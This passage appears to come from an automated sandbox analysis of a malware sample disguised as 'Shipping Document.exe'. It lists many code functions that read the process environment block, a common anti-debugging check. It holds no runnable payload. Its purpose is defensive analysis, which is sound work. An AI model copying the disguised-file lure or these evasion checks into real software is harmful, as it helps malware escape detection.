                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01182349 mov eax, dword ptr fs:[00000030h]10_2_01182349
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D634F mov eax, dword ptr fs:[00000030h]10_2_011D634F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A437C mov eax, dword ptr fs:[00000030h]10_2_011A437C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FE388 mov eax, dword ptr fs:[00000030h]10_2_010FE388
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FE388 mov eax, dword ptr fs:[00000030h]10_2_010FE388
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FE388 mov eax, dword ptr fs:[00000030h]10_2_010FE388
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F8397 mov eax, dword ptr fs:[00000030h]10_2_010F8397
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F8397 mov eax, dword ptr fs:[00000030h]10_2_010F8397
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F8397 mov eax, dword ptr fs:[00000030h]10_2_010F8397
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112438F mov eax, dword ptr fs:[00000030h]10_2_0112438F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112438F mov eax, dword ptr fs:[00000030h]10_2_0112438F
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE3DB mov eax, dword ptr fs:[00000030h]10_2_011AE3DB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE3DB mov eax, dword ptr fs:[00000030h]10_2_011AE3DB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE3DB mov ecx, dword ptr fs:[00000030h]10_2_011AE3DB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011AE3DB mov eax, dword ptr fs:[00000030h]10_2_011AE3DB
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A43D4 mov eax, dword ptr fs:[00000030h]10_2_011A43D4
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011A43D4 mov eax, dword ptr fs:[00000030h]10_2_011A43D4
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A3C0 mov eax, dword ptr fs:[00000030h]10_2_0110A3C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A3C0 mov eax, dword ptr fs:[00000030h]10_2_0110A3C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A3C0 mov eax, dword ptr fs:[00000030h]10_2_0110A3C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A3C0 mov eax, dword ptr fs:[00000030h]10_2_0110A3C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A3C0 mov eax, dword ptr fs:[00000030h]10_2_0110A3C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A3C0 mov eax, dword ptr fs:[00000030h]10_2_0110A3C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011083C0 mov eax, dword ptr fs:[00000030h]10_2_011083C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011083C0 mov eax, dword ptr fs:[00000030h]10_2_011083C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011083C0 mov eax, dword ptr fs:[00000030h]10_2_011083C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011083C0 mov eax, dword ptr fs:[00000030h]10_2_011083C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BC3CD mov eax, dword ptr fs:[00000030h]10_2_011BC3CD
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011863C0 mov eax, dword ptr fs:[00000030h]10_2_011863C0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E3F0 mov eax, dword ptr fs:[00000030h]10_2_0111E3F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E3F0 mov eax, dword ptr fs:[00000030h]10_2_0111E3F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0111E3F0 mov eax, dword ptr fs:[00000030h]10_2_0111E3F0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011363FF mov eax, dword ptr fs:[00000030h]10_2_011363FF
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011103E9 mov eax, dword ptr fs:[00000030h]10_2_011103E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F823B mov eax, dword ptr fs:[00000030h]10_2_010F823B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D625D mov eax, dword ptr fs:[00000030h]10_2_011D625D
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01106259 mov eax, dword ptr fs:[00000030h]10_2_01106259
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BA250 mov eax, dword ptr fs:[00000030h]10_2_011BA250
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011BA250 mov eax, dword ptr fs:[00000030h]10_2_011BA250
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01188243 mov eax, dword ptr fs:[00000030h]10_2_01188243
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01188243 mov ecx, dword ptr fs:[00000030h]10_2_01188243
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010FA250 mov eax, dword ptr fs:[00000030h]10_2_010FA250
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_010F826B mov eax, dword ptr fs:[00000030h]10_2_010F826B
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011B0274 mov eax, dword ptr fs:[00000030h]10_2_011B0274
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01104260 mov eax, dword ptr fs:[00000030h]10_2_01104260
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01104260 mov eax, dword ptr fs:[00000030h]10_2_01104260
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01104260 mov eax, dword ptr fs:[00000030h]10_2_01104260
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E284 mov eax, dword ptr fs:[00000030h]10_2_0113E284
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E284 mov eax, dword ptr fs:[00000030h]10_2_0113E284
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01180283 mov eax, dword ptr fs:[00000030h]10_2_01180283
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01180283 mov eax, dword ptr fs:[00000030h]10_2_01180283
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01180283 mov eax, dword ptr fs:[00000030h]10_2_01180283
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011102A0 mov eax, dword ptr fs:[00000030h]10_2_011102A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011102A0 mov eax, dword ptr fs:[00000030h]10_2_011102A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011962A0 mov eax, dword ptr fs:[00000030h]10_2_011962A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011962A0 mov ecx, dword ptr fs:[00000030h]10_2_011962A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011962A0 mov eax, dword ptr fs:[00000030h]10_2_011962A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011962A0 mov eax, dword ptr fs:[00000030h]10_2_011962A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011962A0 mov eax, dword ptr fs:[00000030h]10_2_011962A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011962A0 mov eax, dword ptr fs:[00000030h]10_2_011962A0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D62D6 mov eax, dword ptr fs:[00000030h]10_2_011D62D6
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A2C3 mov eax, dword ptr fs:[00000030h]10_2_0110A2C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A2C3 mov eax, dword ptr fs:[00000030h]10_2_0110A2C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A2C3 mov eax, dword ptr fs:[00000030h]10_2_0110A2C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A2C3 mov eax, dword ptr fs:[00000030h]10_2_0110A2C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0110A2C3 mov eax, dword ptr fs:[00000030h]10_2_0110A2C3
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011102E1 mov eax, dword ptr fs:[00000030h]10_2_011102E1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011102E1 mov eax, dword ptr fs:[00000030h]10_2_011102E1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011102E1 mov eax, dword ptr fs:[00000030h]10_2_011102E1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01196500 mov eax, dword ptr fs:[00000030h]10_2_01196500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011D4500 mov eax, dword ptr fs:[00000030h]10_2_011D4500
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110535 mov eax, dword ptr fs:[00000030h]10_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110535 mov eax, dword ptr fs:[00000030h]10_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110535 mov eax, dword ptr fs:[00000030h]10_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110535 mov eax, dword ptr fs:[00000030h]10_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110535 mov eax, dword ptr fs:[00000030h]10_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01110535 mov eax, dword ptr fs:[00000030h]10_2_01110535
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E53E mov eax, dword ptr fs:[00000030h]10_2_0112E53E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E53E mov eax, dword ptr fs:[00000030h]10_2_0112E53E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E53E mov eax, dword ptr fs:[00000030h]10_2_0112E53E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E53E mov eax, dword ptr fs:[00000030h]10_2_0112E53E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E53E mov eax, dword ptr fs:[00000030h]10_2_0112E53E
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01108550 mov eax, dword ptr fs:[00000030h]10_2_01108550
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01108550 mov eax, dword ptr fs:[00000030h]10_2_01108550
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113656A mov eax, dword ptr fs:[00000030h]10_2_0113656A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113656A mov eax, dword ptr fs:[00000030h]10_2_0113656A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113656A mov eax, dword ptr fs:[00000030h]10_2_0113656A
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E59C mov eax, dword ptr fs:[00000030h]10_2_0113E59C
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01102582 mov eax, dword ptr fs:[00000030h]10_2_01102582
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01102582 mov ecx, dword ptr fs:[00000030h]10_2_01102582
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_01134588 mov eax, dword ptr fs:[00000030h]10_2_01134588
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011245B1 mov eax, dword ptr fs:[00000030h]10_2_011245B1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011245B1 mov eax, dword ptr fs:[00000030h]10_2_011245B1
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011805A7 mov eax, dword ptr fs:[00000030h]10_2_011805A7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011805A7 mov eax, dword ptr fs:[00000030h]10_2_011805A7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011805A7 mov eax, dword ptr fs:[00000030h]10_2_011805A7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011065D0 mov eax, dword ptr fs:[00000030h]10_2_011065D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A5D0 mov eax, dword ptr fs:[00000030h]10_2_0113A5D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113A5D0 mov eax, dword ptr fs:[00000030h]10_2_0113A5D0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E5CF mov eax, dword ptr fs:[00000030h]10_2_0113E5CF
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0113E5CF mov eax, dword ptr fs:[00000030h]10_2_0113E5CF
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_011025E0 mov eax, dword ptr fs:[00000030h]10_2_011025E0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h]10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h]10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h]10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h] 10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h] 10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h] 10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h] 10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112E5E7 mov eax, dword ptr fs:[00000030h] 10_2_0112E5E7
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113C5ED mov eax, dword ptr fs:[00000030h] 10_2_0113C5ED
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113C5ED mov eax, dword ptr fs:[00000030h] 10_2_0113C5ED
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01138402 mov eax, dword ptr fs:[00000030h] 10_2_01138402
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01138402 mov eax, dword ptr fs:[00000030h] 10_2_01138402
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01138402 mov eax, dword ptr fs:[00000030h] 10_2_01138402
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113A430 mov eax, dword ptr fs:[00000030h] 10_2_0113A430
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_010FC427 mov eax, dword ptr fs:[00000030h] 10_2_010FC427
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_010FE420 mov eax, dword ptr fs:[00000030h] 10_2_010FE420
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_010FE420 mov eax, dword ptr fs:[00000030h] 10_2_010FE420
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_010FE420 mov eax, dword ptr fs:[00000030h] 10_2_010FE420
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01186420 mov eax, dword ptr fs:[00000030h] 10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01186420 mov eax, dword ptr fs:[00000030h] 10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01186420 mov eax, dword ptr fs:[00000030h] 10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01186420 mov eax, dword ptr fs:[00000030h] 10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01186420 mov eax, dword ptr fs:[00000030h] 10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01186420 mov eax, dword ptr fs:[00000030h] 10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01186420 mov eax, dword ptr fs:[00000030h] 10_2_01186420
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112245A mov eax, dword ptr fs:[00000030h] 10_2_0112245A
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011BA456 mov eax, dword ptr fs:[00000030h] 10_2_011BA456
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h] 10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h] 10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h] 10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h] 10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h] 10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h] 10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h] 10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113E443 mov eax, dword ptr fs:[00000030h] 10_2_0113E443
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_010F645D mov eax, dword ptr fs:[00000030h] 10_2_010F645D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112A470 mov eax, dword ptr fs:[00000030h] 10_2_0112A470
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112A470 mov eax, dword ptr fs:[00000030h] 10_2_0112A470
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0112A470 mov eax, dword ptr fs:[00000030h] 10_2_0112A470
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118C460 mov ecx, dword ptr fs:[00000030h] 10_2_0118C460
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011BA49A mov eax, dword ptr fs:[00000030h] 10_2_011BA49A
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011344B0 mov ecx, dword ptr fs:[00000030h] 10_2_011344B0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118A4B0 mov eax, dword ptr fs:[00000030h] 10_2_0118A4B0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011064AB mov eax, dword ptr fs:[00000030h] 10_2_011064AB
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011004E5 mov ecx, dword ptr fs:[00000030h] 10_2_011004E5
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01100710 mov eax, dword ptr fs:[00000030h] 10_2_01100710
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01130710 mov eax, dword ptr fs:[00000030h] 10_2_01130710
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113C700 mov eax, dword ptr fs:[00000030h] 10_2_0113C700
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0117C730 mov eax, dword ptr fs:[00000030h] 10_2_0117C730
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113273C mov eax, dword ptr fs:[00000030h] 10_2_0113273C
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113273C mov ecx, dword ptr fs:[00000030h] 10_2_0113273C
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113273C mov eax, dword ptr fs:[00000030h] 10_2_0113273C
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113C720 mov eax, dword ptr fs:[00000030h] 10_2_0113C720
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113C720 mov eax, dword ptr fs:[00000030h] 10_2_0113C720
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01100750 mov eax, dword ptr fs:[00000030h] 10_2_01100750
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142750 mov eax, dword ptr fs:[00000030h] 10_2_01142750
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01142750 mov eax, dword ptr fs:[00000030h] 10_2_01142750
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0118E75D mov eax, dword ptr fs:[00000030h] 10_2_0118E75D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01184755 mov eax, dword ptr fs:[00000030h] 10_2_01184755
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113674D mov esi, dword ptr fs:[00000030h] 10_2_0113674D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113674D mov eax, dword ptr fs:[00000030h] 10_2_0113674D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0113674D mov eax, dword ptr fs:[00000030h] 10_2_0113674D
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01108770 mov eax, dword ptr fs:[00000030h] 10_2_01108770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110770 mov eax, dword ptr fs:[00000030h] 10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110770 mov eax, dword ptr fs:[00000030h] 10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110770 mov eax, dword ptr fs:[00000030h] 10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110770 mov eax, dword ptr fs:[00000030h] 10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110770 mov eax, dword ptr fs:[00000030h] 10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110770 mov eax, dword ptr fs:[00000030h] 10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110770 mov eax, dword ptr fs:[00000030h] 10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110770 mov eax, dword ptr fs:[00000030h] 10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110770 mov eax, dword ptr fs:[00000030h] 10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110770 mov eax, dword ptr fs:[00000030h] 10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110770 mov eax, dword ptr fs:[00000030h] 10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_01110770 mov eax, dword ptr fs:[00000030h] 10_2_01110770
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011A678E mov eax, dword ptr fs:[00000030h] 10_2_011A678E
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011B47A0 mov eax, dword ptr fs:[00000030h] 10_2_011B47A0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011007AF mov eax, dword ptr fs:[00000030h] 10_2_011007AF
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_0110C7C0 mov eax, dword ptr fs:[00000030h] 10_2_0110C7C0
                Source: C:\Users\user\Desktop\Shipping Document.exe Code function: 10_2_011807C3 mov eax, dword ptr fs:[00000030h] 10_2_011807C3
